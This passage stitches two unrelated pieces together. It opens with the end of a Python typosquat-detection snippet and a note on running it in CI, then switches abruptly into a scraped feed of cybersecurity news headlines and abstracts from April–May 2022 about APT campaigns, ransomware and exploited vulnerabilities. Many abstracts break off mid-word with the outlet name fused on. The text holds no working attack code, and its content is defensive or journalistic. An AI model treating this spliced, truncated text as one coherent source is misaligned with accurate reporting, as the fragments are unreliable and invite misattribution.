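    """Map each suspicious dependency name to the package it resembles."""
    return {d: hit for d in deps if (hit := lookalike_of(d))}

if __name__ == "__main__":
    sample = ["rustdecimal", "rust_decimal", "rust-decimal", "serde_json", "sedre", "tokoi", "clap"]
    print(review_manifest(sample))
```

In practice the watch-list is the top few thousand names from the registry you consume, and the check runs in CI on the lock file; a hit is a review stop, not a hard block, since legitimate forks and companion crates (`serde_json` next to `serde`) sit just outside the distance threshold by design.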
Hackers Exploiting VMware Horizon to Target South Korea with NukeSped Backdoor Full Text
Abstract
The North Korea-backed Lazarus Group has been observed leveraging the Log4Shell vulnerability in VMware Horizon servers to deploy the NukeSped (aka Manuscrypt) implant against targets located in its southern counterpart. "The attacker used the Log4j vulnerability on VMware Horizon products that were not applied with the security patch," AhnLab Security Emergency Response Center (ASEC) said in a new report. The intrusions are said to have been first discovered in April, although multiple threat actors, including those aligned with China and Iran, have employed the same approach to further their objectives over the past few months. NukeSped is a backdoor that can perform various malicious activities based on commands received from a remote attacker-controlled domain. Last year, Kaspersky disclosed a spear-phishing campaign aimed at stealing critical data from defense companies using a NukeSped variant called ThreatNeedle. Some of the key functions of the bacThe Hacker News
May 19, 2022
Hackers Trick Users with Fake Windows 11 Downloads to Distribute Vidar Malware Full Text
Abstract
Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware. "The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware fetch the C2 configuration from attacker-controlled social media channels hosted on Telegram and Mastodon network." Some of the rogue distribution vector domains, which were registered last month on April 20, consist of ms-win11[.]com, win11-serv[.]com, win11install[.]com, and ms-teams-app[.]net. In addition, the cybersecurity firm cautioned that the threat actor behind the impersonation campaign is also leveraging backdoored versions of Adobe Photoshop and other legitimate software such as Microsoft Teams to deliver Vidar malware. The ISO file, for its part,The Hacker News
May 19, 2022
Media giant Nikkei’s Asian unit hit by ransomware attack Full Text
Abstract
Publishing giant Nikkei disclosed that the group's headquarters in Singapore was hit by a ransomware attack almost one week ago, on May 13th.BleepingComputer
May 19, 2022
Washington Local Schools hit with cyberattack Full Text
Abstract
The attack impacted the district's phones, email accounts, internet, WiFi networks, and Google Classroom. Currently, teachers do not have access to outgoing or incoming calls or emails.WTOL
May 19, 2022
New Wave of Brute-Force Attacks Target SQL Servers - Microsoft Warns Full Text
Abstract
Microsoft uncovered a malicious campaign targeting SQL servers using a malware dubbed SuspSQLUsage. Attackers leverage a built-in PowerShell binary to achieve persistence on compromised systems. However, for initial compromise, they rely on brute-force tactics. It is recommended to monitor for ...Cyware Alerts - Hacker News
May 19, 2022
QNAP alerts NAS customers of new DeadBolt ransomware attacks Full Text
Abstract
Taiwan-based network-attached storage (NAS) maker QNAP warned customers on Thursday to secure their devices against attacks pushing DeadBolt ransomware payloads.BleepingComputer
May 18, 2022
Microsoft warns of attacks targeting MSSQL servers using the tool sqlps Full Text
Abstract
Microsoft warns of brute-forcing attacks targeting Microsoft SQL Server (MSSQL) database servers exposed online. Microsoft warns of a new hacking campaign aimed at MSSQL servers; threat actors are launching brute-forcing attacks against poorly protected...Security Affairs
May 18, 2022
Hackers Gain Fileless Persistence on Targeted SQL Servers Using a Built-in Utility Full Text
Abstract
Microsoft on Tuesday warned that it recently spotted a malicious campaign targeting SQL Servers that leverages a built-in PowerShell binary to achieve persistence on compromised systems. The intrusions, which leverage brute-force attacks as an initial compromise vector, stand out for their use of the utility "sqlps.exe," the tech giant said in a series of tweets. The ultimate goals of the campaign are unknown, as is the identity of the threat actor staging it. Microsoft is tracking the malware under the name "SuspSQLUsage." The sqlps.exe utility, which comes by default with all versions of SQL Servers, enables an SQL Agent — a Windows service to run scheduled tasks — to run jobs using the PowerShell subsystem. "The attackers achieve fileless persistence by spawning the sqlps.exe utility, a PowerShell wrapper for running SQL-built cmdlets, to run recon commands and change the start mode of the SQL service to LocalSystem," Microsoft noted. AddiThe Hacker News
May 18, 2022
Chinese ‘Space Pirates’ are hacking Russian aerospace firms Full Text
Abstract
A previously unknown Chinese hacking group known as 'Space Pirates' targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems.BleepingComputer
May 18, 2022
Microsoft warns of brute-force attacks targeting MSSQL servers Full Text
Abstract
Microsoft warned of brute-forcing attacks targeting Internet-exposed and poorly secured Microsoft SQL Server (MSSQL) database servers using weak passwords.BleepingComputer
May 17, 2022
Russian Conti Ransomware Gang Threatens to Overthrow New Costa Rican Government Full Text
Abstract
The notorious Conti ransomware gang, which last month staged an attack on Costa Rican administrative systems, has threatened to "overthrow" the new government of the country. "We are determined to overthrow the government by means of a cyber attack, we have already shown you all the strength and power," the group said on its official website. "We have our insiders in your government. We are also working on gaining access to your other systems, you have no other options but to pay us." In a further attempt to increase pressure, the Russian-speaking cybercrime syndicate has raised its ransom demand to $20 million in return for a decryption key to unlock their systems. Another message posted on its dark web portal over the weekend issued a warning stating it will delete the decryption keys in a week, a move that would make it impossible for Costa Rica to recover access to the files encrypted by the ransomware. "I appeal to every resident of Costa RThe Hacker News
May 17, 2022
Hackers target Tatsu WordPress plugin in millions of attacks Full Text
Abstract
Hackers are massively exploiting a remote code execution vulnerability, CVE-2021-25094, in the Tatsu Builder plugin for WordPress, which is installed on about 100,000 websites.BleepingComputer
May 16, 2022
Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. Tracked as CVE-2022-30525, the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system. Impacted devices include USG FLEX 100, 100W, 200, 500, 700; USG20-VPN, USG20W-VPN; ATP 100, 200, 500, 700, 800; and VPN series. The issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7. Merely a day later, the Shadowserver Foundation said it began detecting exploitation attempts,The Hacker News
May 16, 2022
Nerbian RAT Spreads via Emails in Ongoing Attacks Full Text
Abstract
Nerbian RAT is impersonating the WHO and pretends to contain important information regarding COVID-19. It is currently targeting entities in Italy, Spain, and the U.K. Deploy anti-phishing solutions and email gateways to stay protected.Cyware Alerts - Hacker News
May 16, 2022
Ukraine supporters in Germany targeted with PowerShell RAT malware Full Text
Abstract
An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT (remote access trojan) and stealing their data.BleepingComputer
May 15, 2022
Hackers are exploiting critical bug in Zyxel firewalls and VPNs Full Text
Abstract
Hackers have started to exploit a recently patched critical vulnerability, tracked as CVE-2022-30525, that affects Zyxel firewall and VPN devices for businesses.BleepingComputer
May 15, 2022
Unique IceApple Attack Framework Targets Multiple Sectors Full Text
Abstract
CrowdStrike encountered a previously undocumented post-exploitation framework called IceApple deployed on Exchange servers for data exfiltration. Its long-running campaign focuses on intelligence gathering and indicates that it is a state-sponsored mission, allegedly, aligning with China-nexus, s ...Cyware Alerts - Hacker News
May 14, 2022
Pro-Russian hacktivists target Italy government websites Full Text
Abstract
Pro-Russian hacker group Killnet targeted the websites of several Italian institutions, including the senate and the National Institute of Health. A group of Pro-Russian hackers known as "Killnet" launched an attack against multiple websites of several...Security Affairs
May 13, 2022
New Saitama backdoor Targeted Official from Jordan’s Foreign Ministry Full Text
Abstract
A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama. Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group. "Like many of these attacks, the email contained a malicious attachment," Fortinet researcher Fred Gutierrez said. "However, the attached threat was not a garden-variety malware. Instead, it had the capabilities and techniques usually associated with advanced persistent threats (APTs)." APT34, also known as OilRig, Helix Kitten, and Cobalt Gypsy, is known to be active since at least 2014 and has a track record of striking telecom, government, defense, oil, and financial sectors in the Middle East and North Africa (MENA) via targeted phishing attacks. Earlier this February, ESET tied the group to a long-runniThe Hacker News
May 13, 2022
Iran-linked COBALT MIRAGE group uses ransomware in its operations Full Text
Abstract
Iranian group used Bitlocker and DiskCryptor in a series of attacks targeting organizations in Israel, the US, Europe, and Australia. Researchers at Secureworks Counter Threat Unit (CTU) are investigating a series of attacks conducted by the Iran-linked...Security Affairs
May 13, 2022
Malware Campaign Targets At Least 14 German Automakers Full Text
Abstract
Researchers exposed a months-long campaign targeting German car dealerships and manufacturers to deploy a variety of info-stealing malware. Attacks were traced back to 14 targeted entities in the country. To remain protected, organizations are recommended to use a strong password, deploy anti-phish ...Cyware Alerts - Hacker News
May 12, 2022
Iranian hackers exposed in a highly targeted espionage campaign Full Text
Abstract
Threat analysts have spotted a novel attack attributed to the Iranian hacking group known as APT34 group or Oilrig, who targeted a Jordanian diplomat with custom-crafted tools.BleepingComputer
May 12, 2022
Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks Full Text
Abstract
A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, Charming Kitten, Newscaster, or Phosphorus). "Elements of Cobalt Mirage activity have been reported as Phosphorus and TunnelVision," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The threat actor is said to have conducted two different sets of intrusions, one of which relates to opportunistic ransomware attacks involving the use of legitimate tools like BitLocker and DiskCryptor for financial gain. The second set of attacks is more targeted, carried out with the primary goal of securing access and gathering intelligence, while also deplThe Hacker News
May 11, 2022
Healthcare Technology Provider Omnicell Discloses Ransomware Attack Full Text
Abstract
In its latest Form 10-Q filing with the SEC, the company noted that some of its internal systems were impacted by a ransomware attack on May 4, 2022. There is an impact on certain of the company’s products and services.Security Week
May 11, 2022
Bitter cyberspies target South Asian govts with new malware Full Text
Abstract
New activity has been observed from Bitter, an APT group focused on cyberespionage, targeting the government of Bangladesh with new malware with remote file execution capabilities.BleepingComputer
May 10, 2022
Critical F5 BIG-IP vulnerability targeted by destructive attacks Full Text
Abstract
A recently disclosed F5 BIG-IP vulnerability has been used in destructive attacks, attempting to erase a device's file system and make the server unusable.BleepingComputer
May 10, 2022
Threat actors are actively exploiting CVE-2022-1388 RCE in F5 BIG-IP Full Text
Abstract
Threat actors are exploiting critical F5 BIG-IP flaw CVE-2022-1388 to deliver malicious code, cybersecurity researchers warn. Threat actors started massively exploiting the critical remote code execution vulnerability, tracked as CVE-2022-1388,...Security Affairs
May 10, 2022
FluBot Android malware targets Finland in new SMS campaigns Full Text
Abstract
Finland's National Cyber Security Center (NCSC-FI) has issued a warning about the FluBot Android malware infections increasing due to a new campaign that relies on SMS and MMS for distribution.BleepingComputer
May 10, 2022
German automakers targeted in year-long malware campaign Full Text
Abstract
A years-long phishing campaign has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.BleepingComputer
May 9, 2022
CERT-UA warns of malspam attacks distributing the Jester info stealer Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) warns of attacks spreading info-stealing malware Jester Stealer. The Computer Emergency Response Team of Ukraine (CERT-UA) has detected malspam campaigns aimed at spreading an info-stealer...Security Affairs
May 09, 2022
Ukrainian CERT Warns Citizens of a New Wave of Attacks Distributing Jester Malware Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of phishing attacks that deploy an information-stealing malware called Jester Stealer on compromised systems. The mass email campaign carries the subject line "chemical attack" and contains a link to a macro-enabled Microsoft Excel file, opening which leads to computers getting infected with Jester Stealer. The attack, which requires potential victims to enable macros after opening the document, works by downloading and executing an .EXE file that is retrieved from compromised web resources, CERT-UA detailed. Jester Stealer, which was first documented by Cyble in February 2022, comes with features to steal and transmit login credentials, cookies, and credit card information along with data from password managers, chat messengers, email clients, crypto wallets, and gaming apps to the attackers. "The hackers get the stolen data via Telegram using statically configured proxy addresses (e.g., withThe Hacker News
May 9, 2022
Experts uncovered a new wave of attacks conducted by Mustang Panda Full Text
Abstract
China-linked Mustang Panda APT group targets entities in Asia, the European Union, Russia, and the US in a new wave of attacks. In February 2022, Cisco Talos researchers started observing China-linked cyberespionage group Mustang Panda conducting...Security Affairs
May 09, 2022
Costa Rica declares national emergency after Conti ransomware attacks Full Text
Abstract
The Costa Rican President Rodrigo Chaves has declared a national emergency following cyber attacks from Conti ransomware group. BleepingComputer also observed Conti published most of the 672 GB dump that appears to contain data belonging to the Costa Rican government agencies.BleepingComputer
May 8, 2022
Conti ransomware claims to have hacked Peru MOF – Dirección General de Inteligencia (DIGIMIN) Full Text
Abstract
Conti Ransomware gang claims to have hacked the Peru MOF - Dirección General de Inteligencia (DIGIMIN) and stolen 9.41 GB. The Conti ransomware gang added the Peru MOF - Dirección General de Inteligencia (DIGIMIN) to the list of its victims on its Tor leak...Security Affairs
May 8, 2022
US agricultural machinery manufacturer AGCO suffered a ransomware attack Full Text
Abstract
The American agricultural machinery manufacturer AGCO announced that it has suffered a ransomware attack that impacted its production facilities. AGCO, one of the most important agricultural machinery manufacturers, announced that a ransomware...Security Affairs
May 6, 2022
How the thriving fraud industry within Facebook attacks independent media Full Text
Abstract
Experts investigate how stolen Facebook accounts are used as part of a well-established fraud industry inside Facebook. No eyebrows were raised in Qurium's security operations center when the independent Philippine media outlet Bulatlat once again...Security Affairs
May 06, 2022
US agricultural machinery maker AGCO hit by ransomware attack Full Text
Abstract
AGCO, a leading US-based agricultural machinery producer, has announced it was hit by a ransomware attack impacting some of its production facilities.BleepingComputer
May 6, 2022
Anonymous and Ukraine IT Army continue to target Russian entities Full Text
Abstract
The Anonymous collective and the volunteer group Ukraine IT Army continue to launch cyber attacks on Russian entities. The Anonymous collective continues its cyber war on Russian businesses and government organizations. Below is the list of the most...Security Affairs
May 6, 2022
Russian Ransomware Group Claims Attack on Bulgarian Refugee Agency Full Text
Abstract
LockBit 2.0 posted a notice to the dark web portal it uses to identify and extort its victims saying it had files from the Bulgarian State Agency for Refugees under the Council of Ministers.CyberScoop
May 06, 2022
Experts Uncover New Espionage Attacks by Chinese ‘Mustang Panda’ Hackers Full Text
Abstract
The China-based threat actor known as Mustang Panda has been observed refining and retooling its tactics and malware to strike entities located in Asia, the European Union, Russia, and the U.S. "Mustang Panda is a highly motivated APT group relying primarily on the use of topical lures and social engineering to trick victims into infecting themselves," Cisco Talos said in a new report detailing the group's evolving modus operandi. The group is known to have targeted a wide range of organizations since at least 2012, with the actor primarily relying on email-based social engineering to gain initial access to drop PlugX, a backdoor predominantly deployed for long-term access. Phishing messages attributed to the campaign contain malicious lures masquerading as official European Union reports on the ongoing conflict in Ukraine or Ukrainian government reports, both of which download malware onto compromised machines. Also observed are phishing messages tailored to taThe Hacker News
May 6, 2022
Ukraine IT Army hit EGAIS portal impacting Russia’s alcohol distribution Full Text
Abstract
Ukraine IT Army launched massive DDoS attacks on the EGAIS portal that has a crucial role in Russia's alcohol distribution. The collective of hacktivists Ukraine IT Army has launched a series of massive DDoS attacks on the Unified State Automated...Security Affairs
May 04, 2022
Attackers hijack UK NHS email accounts to steal Microsoft logins Full Text
Abstract
For about half a year, work email accounts belonging to over 100 employees of the National Health System (NHS) in the U.K. were used in several phishing campaigns, some aiming to steal Microsoft logins.BleepingComputer
May 4, 2022
China-linked Winnti Hackers Perform Rare Windows Mechanism Abuse in Three-year-long Campaign Full Text
Abstract
According to researchers, the attacks have been focused on infiltrating the networks of technology and manufacturing companies in Europe, Asia, and North America, focusing on stealing sensitive proprietary information.ZDNet
May 04, 2022
Heroku forces user password resets but fails to explain why Full Text
Abstract
Salesforce-owned Heroku is performing a forced password reset on a subset of user accounts in response to last month's security incident while providing no information as to why they are doing so other than vaguely mentioning it is to further secure accounts.BleepingComputer
May 4, 2022
Transport for NSW struck by cyberattack Full Text
Abstract
Transport for NSW has confirmed its Authorised Inspection Scheme (AIS) online application was impacted by a cyber incident in early April. The AIS authorizes examiners to inspect vehicles to ensure a minimum safety standard.ZDNet
May 04, 2022
Pro-Ukraine hackers use Docker images to DDoS Russian sites Full Text
Abstract
Docker images with a download count of over 150,000 have been used to run distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites managed by government, military, and news organizations.BleepingComputer
May 02, 2022
GitHub Says Recent Attack Involving Stolen OAuth Tokens Was “Highly Targeted” Full Text
Abstract
Cloud-based code hosting platform GitHub described the recent attack campaign involving the abuse of OAuth access tokens issued to Heroku and Travis-CI as "highly targeted" in nature. "This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories," GitHub's Mike Hanley said in an updated post. The security incident , which it discovered on April 12, related to an unidentified attacker leveraging stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM. The Microsoft-owned company said last week that it's in the process of sending a final set of notifications to GitHub customers who had either the Heroku or Travis CI OAuth app integrations authorized in their accounts. According to a detailed step-by-step analysis carried out by GitHub, thThe Hacker News
May 02, 2022
Chinese cyber-espionage group Moshen Dragon targets Asian telcos Full Text
Abstract
Researchers have identified a new cluster of malicious cyber activity tracked as Moshen Dragon, targeting telecommunication service providers in Central Asia.BleepingComputer
May 2, 2022
Rocket Kitten Targets VMware Flaws In the Wild Full Text
Abstract
Iran-linked Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems. Users of the associated VMWare products should review their VMware architecture to make sure the ...Cyware Alerts - Hacker News
May 2, 2022
Amazon Web Services Targeted by a Package Backfill Attack Full Text
Abstract
WhiteSource identified, blocked, and reported two packages that were deemed to be malicious versions of original AWS packages. WhiteSource security experts have reached out to contacts at Amazon to notify them of their findings.White Source Software
May 02, 2022
Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia Full Text
Abstract
A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022. Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652). "This latest wave of spear phishing showcases APT29's enduring interests in obtaining diplomatic and foreign policy information from governments around the world," Mandiant said in a report published last week. The initial access is said to have been aided through spear-phishing emails masquerading as administrative notices, using legitimate but compromised email addresses from other diplomatic entities. These emails contain an HTML dropper attachment called ROOTSAW (aka EnvyScout) that, when opened, triggers an infection sequence that delivers and execThe Hacker News
May 02, 2022
Car rental giant Sixt facing disruptions due to a cyberattack Full Text
Abstract
Car rental giant Sixt was hit by a weekend cyberattack causing business disruptions at customer care centers and select branchBleepingComputer
April 30, 2022
Emotet tests new attack chain in low volume campaigns Full Text
Abstract
Emotet operators are testing new attack techniques in response to Microsoft's move to disable Visual Basic for Applications (VBA) macros by default. The operators of the infamous Emotet botnet are testing new attack techniques in response to Microsoft's...Security Affairs
April 29, 2022
Microsoft Documents Over 200 Cyberattacks by Russia Against Ukraine Full Text
Abstract
At least six different Russia-aligned actors launched no less than 237 cyberattacks against Ukraine from February 23 to April 8, including 38 discrete destructive attacks that irrevocably destroyed files in hundreds of systems across dozens of organizations in the country. "Collectively, the cyber and kinetic actions work to disrupt or degrade Ukrainian government and military functions and undermine the public's trust in those same institutions," the company's Digital Security Unit (DSU) said in a special report. The major malware families that have been leveraged for destructive activity as part of Russia's relentless digital assaults include: WhisperGate, HermeticWiper (FoxBlade aka KillDisk), HermeticRansom (SonicVote), IssacWiper (Lasainraw), CaddyWiper, DesertBlade, DoubleZero (FiberLake), and Industroyer2. WhisperGate, HermeticWiper, IssacWiper, and CaddyWiper are all data wipers designed to overwrite data and render machines unbootThe Hacker News
April 29, 2022
Anonymous hacked Russian PSCB Commercial Bank and companies in the energy sector Full Text
Abstract
OpRussia continues: less than a week after my last update, Anonymous has hacked other Russian companies and leaked their data via DDoSecrets. The #OpRussia launched by Anonymous on Russia after the criminal invasion of Ukraine continues, the collective...Security Affairs
April 28, 2022
Hundreds of Cyberattacks Launched on Ukraine - Microsoft Report Full Text
Abstract
Right before the invasion, at least six distinct Russian actors launched more than 237 attacks. All of these attacks were of a destructive nature and many are still ongoing.Cyware Alerts - Hacker News
April 28, 2022
Russia-linked threat actors launched hundreds of cyberattacks on Ukraine Full Text
Abstract
Microsoft revealed that Russia launched hundreds of cyberattacks against Ukraine since the beginning of the invasion. Microsoft states that at least six separate Russia-linked threat actors launched more than 237 operations against Ukraine starting...Security Affairs
April 27, 2022
Cloudflare Thwarts Record DDoS Attack Peaking at 15 Million Requests Per Second Full Text
Abstract
Cloudflare on Wednesday disclosed that it acted to mitigate a 15.3 million request-per-second (RPS) distributed denial-of-service (DDoS) attack. The web infrastructure and website security company called it one of the "largest HTTPS DDoS attacks on record." "HTTPS DDoS attacks are more expensive in terms of required computational resources because of the higher cost of establishing a secure TLS encrypted connection," Cloudflare's Omer Yoachimik and Julien Desgats said. "Therefore it costs the attacker more to launch the attack, and for the victim to mitigate it." The volumetric DDoS attack is said to have lasted less than 15 seconds and targeted an unnamed Cloudflare customer operating a crypto launchpad. Volumetric DDoS attacks are designed to overwhelm a target network/service with significantly high volumes of malicious traffic, which typically originate from a botnet under a threat actor's control. Cloudflare said the latest attack wThe Hacker News
April 27, 2022
Chinese Hackers Targeting Russian Military Personnel with Updated PlugX Malware Full Text
Abstract
A China-linked government-sponsored threat actor observed striking European diplomatic entities in March may have been targeting Russian government officials with an updated version of a remote access trojan called PlugX. Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG. "The war in Ukraine has prompted many countries to deploy their cyber capabilities to gain insight about global events, political machinations, and motivations," the cybersecurity firm said in a report shared with The Hacker News. "This desire for situational awareness often extends to collecting intelligence from allies and 'friends.'" Bronze President, active since at least July 2018, has a history of conducting espionage operations by leveraging custom and publicly available tools to compromise, maintain long-term access,The Hacker News
April 27, 2022
Wind Turbine giant Deutsche Windtechnik hit by a professional Cyberattack Full Text
Abstract
The German wind turbine giant Deutsche Windtechnik was hit by a targeted cyberattack earlier this month. German wind turbine giant Deutsche Windtechnik announced that some of its systems were hit by a targeted professional cyberattack earlier this...Security Affairs
April 27, 2022
Microsoft says Russia hit Ukraine with hundreds of cyberattacks Full Text
Abstract
Microsoft has revealed the true scale of Russian-backed cyberattacks against Ukraine since the invasion, with hundreds of attempts from multiple Russian hacking groups targeting the country's infrastructure and Ukrainian citizens.BleepingComputer
April 27, 2022
German Wind Turbine Firm Hit by ‘Targeted, Professional Cyberattack’ Full Text
Abstract
German wind turbine giant Deutsche Windtechnik has issued a notification to warn that some of its IT systems were impacted in a targeted professional cyberattack earlier this month.Security Week
April 26, 2022
American Dental Association hit by new Black Basta ransomware Full Text
Abstract
The American Dental Association (ADA) was hit by a weekend cyberattack, causing them to shut down portions of their network while investigating the attack.BleepingComputer
April 26, 2022
North Korean Hackers Target Journalists with GOLDBACKDOOR Malware Full Text
Abstract
A state-backed threat actor with ties to the Democratic People's Republic of Korea (DPRK) has been attributed to a spear-phishing campaign targeting journalists covering the country with the ultimate goal of deploying a backdoor on infected Windows systems. The intrusions, said to be the work of Ricochet Chollima, resulted in the deployment of a novel malware strain called GOLDBACKDOOR, an artifact that shares technical overlaps with another malware named BLUELIGHT, which has been previously linked to the group. "Journalists are high-value targets for hostile governments," cybersecurity firm Stairwell said in a report published last week. "Compromising a journalist can provide access to highly-sensitive information and enable additional attacks against their sources." Ricochet Chollima, also known as APT37, InkySquid, and ScarCruft, is a North Korean-nexus targeted intrusion adversary that has been involved in espionage attacks since at least 2016. TheThe Hacker News
April 25, 2022
Iranian Hackers Exploiting VMware RCE Bug to Deploy ‘Core Impact’ Backdoor Full Text
Abstract
An Iranian-linked threat actor known as Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems. Tracked as CVE-2022-22954 (CVSS score: 9.8), the critical issue concerns a case of remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager. While the issue was patched by the virtualization services provider on April 6, 2022, the company cautioned users of confirmed exploitation of the flaw occurring in the wild a week later. "A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface," researchers from Morphisec Labs said in a new report. "This means highest privileged access into any components of the virtualized host and guest environment." Attack chains exploiting the flaw involve the distribution of a PowerShell-based stager, which is theThe Hacker News
April 22, 2022
Conti ransomware claims responsibility for the attack on Costa Rica Full Text
Abstract
Conti ransomware gang claimed responsibility for a ransomware attack that hit the government infrastructure of Costa Rica. Last week a ransomware attack crippled the government infrastructure of Costa Rica, causing chaos. The Conti ransomware...Security Affairs
April 21, 2022
Docker servers hacked in ongoing cryptomining malware campaign Full Text
Abstract
Docker APIs on Linux servers are being targeted by a large-scale Monero crypto-mining campaign from the operators of the Lemon_Duck botnet.BleepingComputer
April 21, 2022
GitHub restores popular Python repo hit by bogus DMCA takedown Full Text
Abstract
Yesterday, following a DMCA complaint, GitHub took down a repository that hosts the official SymPy project documentation website. It turns out the DMCA notice filed by HackerRank's representatives was sent out in error and generated much backlash from the open source community. The DMCA notice has since been rescinded.BleepingComputer
April 20, 2022
Russian state hackers hit Ukraine with new malware variants Full Text
Abstract
Threat analysts report that the Russian state-sponsored threat group known as Gamaredon (Armageddon, Shuckworm) is still notably active in Ukrainian computer networks.BleepingComputer
April 20, 2022
Shuckworm Espionage Group Continues Pterodo Backdoor Campaign Against Ukraine Full Text
Abstract
The Russia-linked Shuckworm (aka Gamaredon) group is continually refining its malware and often deploying multiple payloads to maximize the chances of maintaining a persistent presence on targeted networks.Symantec
April 19, 2022
Attacks Against DeFi Protocols Surge Full Text
Abstract
Last year, more than $3 billion worth of digital assets were stolen. In Q1 2022, over $1.3 billion has already been stolen, indicating that the path taken by cybercriminals is even more aggressive this year.Cyware Alerts - Hacker News
April 19, 2022
Experts Uncover Spyware Attacks Against Catalan Politicians and Activists Full Text
Abstract
A previously unknown zero-click exploit in Apple's iMessage was used to install mercenary spyware from NSO Group and Candiru against at least 65 individuals as part of a "multi-year clandestine operation." "Victims included Members of the European Parliament, Catalan Presidents, legislators, jurists, and members of civil society organizations," the University of Toronto's Citizen Lab said in a new report. "Family members were also infected in some cases." Of the 65 individuals, 63 were targeted with Pegasus and four others were infected with Candiru, with iPhones belonging to at least two compromised with both. The incidents are said to have mostly occurred between 2017 and 2020. The attacks involved the weaponization of an iOS exploit dubbed HOMAGE that made it possible to penetrate the devices running versions prior to iOS 13.2, which was released on October 28, 2019. It's worth noting that the latest version of iOS is iOS 15.4.1.The Hacker News
April 19, 2022
New IcedID Malware Campaign Targets Ukrainian Government Full Text
Abstract
The targeted intrusions are a part of hostile activities against the nation since the year started. As per CERT-UA, the country has suffered 362 cyberattacks since the invasion.Cyware Alerts - Hacker News
April 18, 2022
Newly found zero-click iPhone exploit used in NSO spyware attacks Full Text
Abstract
Digital threat researchers at Citizen Lab have discovered a new zero-click iMessage exploit used to install NSO Group spyware on devices belonging to Catalan politicians, journalists, and activists.BleepingComputer
April 18, 2022
Enemybot and Fodcha - Leading the Next Waves of Botnet Attacks Full Text
Abstract
Researchers discovered Fodcha, a growing botnet that compromises over 100 victims a day. Meanwhile, FortiGuard Labs observed a new DDoS botnet dubbed Enemybot, allegedly working with Keksec. The best way to stop/avoid such attacks is to patch any exploitable vulnerabilities in your network.Cyware Alerts - Hacker News
April 17, 2022
New Hacking Campaign Targeting Ukrainian Government with IcedID Malware Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new wave of social engineering campaigns delivering IcedID malware and leveraging Zimbra exploits with the goal of stealing sensitive information. Attributing the IcedID phishing attacks to a threat cluster named UAC-0041, the agency said the infection sequence begins with an email containing a Microsoft Excel document (Мобілізаційний реєстр.xls or Mobilization Register.xls) that, when opened, prompts the users to enable macros, leading to the deployment of IcedID. The information-stealing malware, also known as BokBot, has followed a similar trajectory to that of TrickBot, Emotet, and ZLoader, evolving from its earlier roots as a banking trojan to a full-fledged crimeware service that facilitates the retrieval of next-stage implants such as ransomware. The second set of targeted intrusions relates to a new threat group dubbed UAC-0097, with the email including a number of image attachments with a Cont...The Hacker News
April 16, 2022
The unceasing action of Anonymous against Russia Full Text
Abstract
This week the Anonymous collective and its affiliates have targeted multiple Russian organizations stealing gigabytes of data. This week Anonymous and other hacker groups affiliated with the collective have launched multiple attacks against Russian...Security Affairs
April 16, 2022
Threat actors target the Ukrainian gov with IcedID malware Full Text
Abstract
Threat actors are targeting Ukrainian government agencies with phishing attacks delivering the IcedID malware. The Ukrainian Computer Emergency Response Team (CERT-UA) uncovered new phishing campaigns aimed at infecting systems of Ukrainian government...Security Affairs
April 15, 2022
Spanish FA report cyber attack to police after email accounts, private texts stolen Full Text
Abstract
Documents and information from email accounts, private texts, and audio conversations from top executives of the federation, including president Luis Rubiales, have been stolen in recent months.ESPN
April 15, 2022
Threat actors use Zimbra exploits to target organizations in Ukraine Full Text
Abstract
Threat actors are targeting Ukrainian government organizations with exploits for XSS vulnerabilities in Zimbra Collaboration Suite (CVE-2018-6882). Ukraine's CERT (CERT-UA) warns of threat actors that are targeting government organizations with exploits...Security Affairs
April 15, 2022
Attack on Panasonic Canada Shows Conti is Still Dangerous Full Text
Abstract
